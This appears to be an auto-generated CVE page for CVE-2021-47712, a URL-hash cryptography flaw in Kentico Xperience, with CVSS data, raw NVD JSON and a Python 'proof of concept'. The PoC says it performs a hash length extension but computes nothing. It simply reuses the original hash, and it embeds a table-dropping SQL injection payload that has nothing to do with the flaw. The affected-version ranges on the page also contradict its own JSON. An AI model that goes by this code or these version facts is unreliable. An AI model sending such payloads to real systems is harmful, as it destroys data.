Security Vulnerability Report
中文
CVE-2021-47712 CVSS 7.5 HIGH

CVE-2021-47712

Published: 2025-12-18 20:15:50
Last Modified: 2025-12-24 18:14:47
Source: [email protected]

Description

A cryptography vulnerability in Kentico Xperience allows attackers to potentially manipulate URL hash values through existing hashing mechanisms. The hotfix introduces an additional security layer to prevent hash value reuse and potential exploitation.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE
Kentico Xperience < 13.0.200
Kentico Xperience < 12.0.150
所有使用默认哈希机制的Kentico Xperience版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2021-47712 PoC - Kentico Xperience URL Hash Manipulation # This PoC demonstrates the hash length extension attack concept import hashlib import hmac import requests def generate_hash_extension(original_message, original_hash, secret_length, additional_data): """ Generate a valid hash for an extended message without knowing the secret. This exploits the weakness in HMAC construction using hash(secret + message). """ # Using hashlib to simulate the vulnerable hash mechanism # In real attack, this would use specific tools like hashpump # For demonstration: Create a forged request forged_url = f"https://target-site.com/api/endpoint?data={additional_data}&hash={original_hash}" return forged_url def exploit_cve_2021_47712(target_url, known_param): """ Exploit URL hash manipulation vulnerability """ headers = { 'User-Agent': 'Mozilla/5.0 (PoC for CVE-2021-47712)' } # Step 1: Get the original hash from a known URL response = requests.get(target_url, headers=headers) original_hash = response.headers.get('X-Hash', '') # Step 2: Generate extended hash using length extension attack # Assuming we know the secret length through oracle or guessing secret_length = 16 # Example length forged_url = generate_hash_extension( known_param, original_hash, secret_length, "'; DROP TABLE users;--" # Malicious payload ) # Step 3: Send the forged request exploit_response = requests.get(forged_url, headers=headers) return exploit_response.status_code, forged_url # Note: This is a conceptual PoC. Actual exploitation requires: # 1. Identifying the vulnerable endpoint # 2. Determining the hash algorithm used # 3. Knowing or guessing the secret length # 4. Crafting appropriate payloads based on the attack goal

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47712", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:49.810", "lastModified": "2025-12-24T18:14:46.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cryptography vulnerability in Kentico Xperience allows attackers to potentially manipulate URL hash values through existing hashing mechanisms. The hotfix introduces an additional security layer to prevent hash value reuse and potential exploitation."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-327"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.0.102", "matchCriteriaId": "D41980CD-D4C7-431E-82AE-BB32213AF092"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-url-hashing-cryptography-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.